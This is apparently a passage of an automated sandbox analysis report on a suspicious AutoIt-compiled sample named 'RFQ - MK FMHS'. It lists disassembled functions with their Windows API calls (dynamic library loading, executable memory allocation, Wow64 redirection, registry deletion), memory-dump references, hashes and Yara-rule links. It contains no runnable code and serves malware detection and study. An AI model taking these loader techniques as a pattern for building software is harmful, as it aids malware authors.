                    • CoCreateInstance.OLE32(00F02D6C,00000000,00000001,00F02BDC,?), ref: 00EDBC3F
                    • CoUninitialize.OLE32 ref: 00EDBC5C
                      • Part of subcall function 00E79997: __itow.LIBCMT ref: 00E799C2
                      • Part of subcall function 00E79997: __swprintf.LIBCMT ref: 00E79A0C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                    • String ID: .lnk
                    • API String ID: 2126378814-24824748
                    • Opcode ID: 1d875b4bcf47806565ebe99f455fa22045257801d10543539a45f1183b556f44
                    • Instruction ID: aafa68d7d861702f24c0f2d11d8b582045ae5743438a70407ce2b2962df2dd6e
                    • Opcode Fuzzy Hash: 1d875b4bcf47806565ebe99f455fa22045257801d10543539a45f1183b556f44
                    • Instruction Fuzzy Hash: 6FA166756043019FCB04DF14C484D6ABBE5FF88324F158999F899AB3A2DB31ED46CB92
                    Function 00E9524D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                    Download Yara Rule
                    APIs
                    • __startOneArgErrorHandling.LIBCMT ref: 00E952DD
                      • Part of subcall function 00EA0340: __87except.LIBCMT ref: 00EA037B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: ErrorHandling__87except__start
                    • String ID: pow
                    • API String ID: 2905807303-2276729525
                    • Opcode ID: 3ad570f3aac681859ad0475360c1277d025d52d689ba60d8cc36807a34c8045d
                    • Instruction ID: 6e221f35f77111655701e6a549f1ac5bce261847866fb81ffc46006812d63613
                    • Opcode Fuzzy Hash: 3ad570f3aac681859ad0475360c1277d025d52d689ba60d8cc36807a34c8045d
                    • Instruction Fuzzy Hash: 8C518022E0D70587DF12B714C95137E3BD0AB0A354F20BD98F495691E9DF74ACC49B46
                    Function 00E9023B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID:
                    • String ID: #$+
                    • API String ID: 0-2552117581
                    • Opcode ID: 19daf68c3a7b1bb94f61d7f6c54c62b9c1546bc29e640da58546425ef52b2dc6
                    • Instruction ID: 5a15b53212221c1da567b92a4ed911fc0e661ddd59de3278d889c1a5b1b0aaf8
                    • Opcode Fuzzy Hash: 19daf68c3a7b1bb94f61d7f6c54c62b9c1546bc29e640da58546425ef52b2dc6
                    • Instruction Fuzzy Hash: 5A51FF765043468FCF15DF28C488AFA7BA4EF55314F945059EC92BB2A0D731AD82CB61
                    Function 00E83297 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 161COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: _memmove$_free
                    • String ID: Oa
                    • API String ID: 2620147621-3945284152
                    • Opcode ID: 39dee81bca9cdf22d240f330d17e12c7bcb4df2a7d270f2cac2b4a02b246509a
                    • Instruction ID: ee66ca4714bf7b9e4326760c9643cf2e3c05d07934ea2fa907213042bbc89798
                    • Opcode Fuzzy Hash: 39dee81bca9cdf22d240f330d17e12c7bcb4df2a7d270f2cac2b4a02b246509a
                    • Instruction Fuzzy Hash: C25178B16083419FDB24DF28C481A6BBBE5AF85704F04582DE98DA7361EB31E901CB82
                    Function 00E862F2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: _memset$_memmove
                    • String ID: ERCP
                    • API String ID: 2532777613-1384759551
                    • Opcode ID: be786112ba686ba70f2392e9bac98238b7b82677b318e7778efb620ae8905b4c
                    • Instruction ID: 9d5d73183f0ba87cfd0b35288a21d3eaa16ace3e9e09b6d8141329ef4d480e10
                    • Opcode Fuzzy Hash: be786112ba686ba70f2392e9bac98238b7b82677b318e7778efb620ae8905b4c
                    • Instruction Fuzzy Hash: 5A51C2719003099FCB24DF64C881BAEBBF4FF04318F24956EE95EEA241E7759581CB40
                    Function 00EF7BB5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                    Download Yara Rule
                    APIs
                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00EFF910,00000000,?,?,?,?), ref: 00EF7C4E
                    • GetWindowLongW.USER32 ref: 00EF7C6B
                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00EF7C7B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Window$Long
                    • String ID: SysTreeView32
                    • API String ID: 847901565-1698111956
                    • Opcode ID: afff8c6656f8b9ace8244b72fad79a7df13c6a42d5b072e514246120851d5b18
                    • Instruction ID: abb2f93322bcae1bf9b5f4f2287c9d1848cf28dfbe86d65cd29664d98de43bde
                    • Opcode Fuzzy Hash: afff8c6656f8b9ace8244b72fad79a7df13c6a42d5b072e514246120851d5b18
                    • Instruction Fuzzy Hash: D7318031204209ABDB118E38DC41BEA77A9EF49328F245725FAB9F32E0D731E8519B50
                    Function 00EF7648 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00EF76D0
                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00EF76E4
                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00EF7708
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: MessageSend$Window
                    • String ID: SysMonthCal32
                    • API String ID: 2326795674-1439706946
                    • Opcode ID: eea33b6a0ee09d68f70c362141ed240efe198167abc0fd05c61c7fe18c0c71a3
                    • Instruction ID: 546b7ab55a055e24a678230dacced64190c57b0ea385e3075c9bffd85b963531
                    • Opcode Fuzzy Hash: eea33b6a0ee09d68f70c362141ed240efe198167abc0fd05c61c7fe18c0c71a3
                    • Instruction Fuzzy Hash: DB21BF32500218BBDF158E64CC42FEA3BA9EF88728F111254FE55BB1D0DAB1A851DBA0
                    Function 00EF6F1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00EF6FAA
                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00EF6FBA
                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00EF6FDF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: MessageSend$MoveWindow
                    • String ID: Listbox
                    • API String ID: 3315199576-2633736733
                    • Opcode ID: 56914e49e60dfad080b1650e1358a8e9253e62165dc8a20fc51a21e0eea29a3c
                    • Instruction ID: da705b0381819c3da0162b3069299258195ed94eed6cdc4412c3ad4c7ba2eb87
                    • Opcode Fuzzy Hash: 56914e49e60dfad080b1650e1358a8e9253e62165dc8a20fc51a21e0eea29a3c
                    • Instruction Fuzzy Hash: D3218032710118BFDF118F54DC85EBB3BAAEF89764F019124FA14AB190CA71AC51DBA0
                    Function 00EF797D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00EF79E1
                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00EF79F6
                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00EF7A03
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID: msctls_trackbar32
                    • API String ID: 3850602802-1010561917
                    • Opcode ID: 7726359b5b9a2db6e6fd705b597d9664f9b54b506776698cf5380eda7c30be39
                    • Instruction ID: 5798e3f9ef22b8c84b46e25b0399a7ccdbc858f3aac1f15ce0f4dbd10cc46afc
                    • Opcode Fuzzy Hash: 7726359b5b9a2db6e6fd705b597d9664f9b54b506776698cf5380eda7c30be39
                    • Instruction Fuzzy Hash: 8511E732244208BADF149F64CC05FEB77A9EFC9768F025519FB41B6090D671D811DB60
                    Function 00E74C95 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00E74C2E), ref: 00E74CA3
                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00E74CB5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: GetNativeSystemInfo$kernel32.dll
                    • API String ID: 2574300362-192647395
                    • Opcode ID: df1e4ddfd78cfdf6a53fc85f924b31ece7094f23281346847a812e4ba1b4f36f
                    • Instruction ID: 1fef897b9b5b4d87c03fcd5709b12d73752fe70e3bd6bd16542f54f1634c2a71
                    • Opcode Fuzzy Hash: df1e4ddfd78cfdf6a53fc85f924b31ece7094f23281346847a812e4ba1b4f36f
                    • Instruction Fuzzy Hash: 4DD05E70511727CFE7309F32DE58626B6E5AF45795B21D83ED88AF6290E770D880CA50
                    Function 00E74D94 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00E74CE1,?), ref: 00E74DA2
                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00E74DB4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                    • API String ID: 2574300362-1355242751
                    • Opcode ID: ff92ad70f869a3794e0acb168ec19ef4f0e9cdb6a8a62b493b36499cbf8dcbce
                    • Instruction ID: 65a1be59fccff1ff0703d302c8dd21a1934f910c31324b45f2f80c6b06444e9c
                    • Opcode Fuzzy Hash: ff92ad70f869a3794e0acb168ec19ef4f0e9cdb6a8a62b493b36499cbf8dcbce
                    • Instruction Fuzzy Hash: EFD05E71550723CFD7309F32D858A5676E4AF05359B11D83ED9DAF6290E770D884CA50
                    Function 00E74D61 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00E74D2E,?,00E74F4F,?,00F362F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00E74D6F
                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00E74D81
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                    • API String ID: 2574300362-3689287502
                    • Opcode ID: 311456086897f2685e65081b8ea834a2694d2f4acfb9560d623f98877d628836
                    • Instruction ID: d80003d05675f6db4100395fa3d76d619a43827b7340887126480b521e2b2d7e
                    • Opcode Fuzzy Hash: 311456086897f2685e65081b8ea834a2694d2f4acfb9560d623f98877d628836
                    • Instruction Fuzzy Hash: 2ED01770510723CFD7309F32D84862676E8AF55356B11D83AD5CAE6290E770D884CA50
                    Function 00EF1072 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryA.KERNEL32(advapi32.dll,?,00EF12C1), ref: 00EF1080
                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00EF1092
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: RegDeleteKeyExW$advapi32.dll
                    • API String ID: 2574300362-4033151799
                    • Opcode ID: 9e987ca15c92723c1dee231a7e950f0676af6a804c4262b3d54842a9a5766959
                    • Instruction ID: f4389fe666247f1b539c26d40836c63ded4e6e554091e97b155b86a0e0c4bed1
                    • Opcode Fuzzy Hash: 9e987ca15c92723c1dee231a7e950f0676af6a804c4262b3d54842a9a5766959
                    • Instruction Fuzzy Hash: 5DD0123051072BCFD7305F35D81852676E4AF45355B118C79E885E6290EB74D4C0C751
                    Function 00EE93F5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00EE9009,?,00EFF910), ref: 00EE9403
                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00EE9415
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: GetModuleHandleExW$kernel32.dll
                    • API String ID: 2574300362-199464113
                    • Opcode ID: c0964bfa12c2e069b41746db68da8448797c9d94bd91cca466ae41b986b4931c
                    • Instruction ID: 5b4aa14a9ad1ac086b09d7dc0b367d259982712966174db44372efd559f2cea9
                    • Opcode Fuzzy Hash: c0964bfa12c2e069b41746db68da8448797c9d94bd91cca466ae41b986b4931c
                    • Instruction Fuzzy Hash: 5CD0C73050032BCFC7208F33D98821272E4AF00341B00C83AE492F2692E670C880CA10
                    Function 00EC76C5 Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0fafd83050152f8026cd87e5864cc22e77b98b3ad7e989c0443b0db5afaead61
                    • Instruction ID: f1fd241756b4ea2a02d96e913f42d758116e4e7c965c2daa6fe04a7af5634d45
                    • Opcode Fuzzy Hash: 0fafd83050152f8026cd87e5864cc22e77b98b3ad7e989c0443b0db5afaead61
                    • Instruction Fuzzy Hash: 91C15975A04216EFCB14CF94C984EAEBBB5FF88314B11959DE886EB250D731DD82CB90
                    Function 00EEE33E Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                    Download Yara Rule
                    APIs
                    • CharLowerBuffW.USER32(?,?), ref: 00EEE3D2
                    • CharLowerBuffW.USER32(?,?), ref: 00EEE415
                      • Part of subcall function 00EEDAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00EEDAD9
                    • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00EEE615
                    • _memmove.LIBCMT ref: 00EEE628
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: BuffCharLower$AllocVirtual_memmove
                    • String ID:
                    • API String ID: 3659485706-0
                    • Opcode ID: c54771b8aafb5ab932157dd03e54202424ea9d10354fd05ebf6973ea17839f72
                    • Instruction ID: b1003cea3f160d2affcafa446fe813b36ef25e7f576b8b0f147034bc86ae7072
                    • Opcode Fuzzy Hash: c54771b8aafb5ab932157dd03e54202424ea9d10354fd05ebf6973ea17839f72
                    • Instruction Fuzzy Hash: 2DC17C716083419FC714DF29C48096ABBE4FF88718F14996EF899AB351D731EA45CB82
                    Function 00EE83A8 Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                    Download Yara Rule
                    APIs
                    • CoInitialize.OLE32(00000000), ref: 00EE83D8
                    • CoUninitialize.OLE32 ref: 00EE83E3
                      • Part of subcall function 00ECDA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00ECDAC5
                    • VariantInit.OLEAUT32(?), ref: 00EE83EE
                    • VariantClear.OLEAUT32(?), ref: 00EE86BF
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                    • String ID:
                    • API String ID: 780911581-0
                    • Opcode ID: 43e06d4b6bcc398db33b47b12d7028317105e1499613e17746c10c9810e065d3
                    • Instruction ID: bc28fc5c2c00b609283159cce79c02faa85577fb454419a0bb81bf646207f75e
                    • Opcode Fuzzy Hash: 43e06d4b6bcc398db33b47b12d7028317105e1499613e17746c10c9810e065d3
                    • Instruction Fuzzy Hash: E1A139752047459FDB10DF15C585B2AB7E4BF88324F14A45DFA9AAB3A2CB30ED04CB42
                    Function 00EC7A78 Relevance: 6.2, APIs: 4, Instructions: 231COMMON
                    Download Yara Rule
                    APIs
                    • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00F02C7C,?), ref: 00EC7C32
                    • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00F02C7C,?), ref: 00EC7C4A
                    • CLSIDFromProgID.OLE32(?,?,00000000,00EFFB80,000000FF,?,00000000,00000800,00000000,?,00F02C7C,?), ref: 00EC7C6F
                    • _memcmp.LIBCMT ref: 00EC7C90
                    Memory Dump Source
